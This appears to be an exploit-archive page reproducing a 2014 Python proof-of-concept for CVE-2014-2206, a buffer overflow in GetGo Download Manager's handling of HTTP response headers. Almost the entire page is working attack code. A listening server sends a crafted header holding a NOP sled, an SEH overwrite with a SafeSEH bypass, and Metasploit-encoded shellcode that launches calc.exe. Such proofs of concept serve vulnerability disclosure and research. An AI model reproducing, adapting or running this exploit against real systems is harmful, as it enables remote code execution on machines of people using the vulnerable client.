Home / exploitsPDF  

GetGo Download Manager 4.9.0.1982 Buffer Overflow

Posted on 11 March 2014

#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#

from socket import *
from time import sleep
from struct import pack

host = "192.168.0.1"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "
[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

junk0 = "x90" * 4107
nseh = "x90x90xEBx06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "x90" * 50

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d'

shellcode = ("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")

payload = junk0 + nseh + seh + nops + shellcode

buffer = "HTTP/1.1 200 "+payload+"
"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK
"

sleep(3)
cl.close()
s.close()

 

TOP

Malware :

Exploits :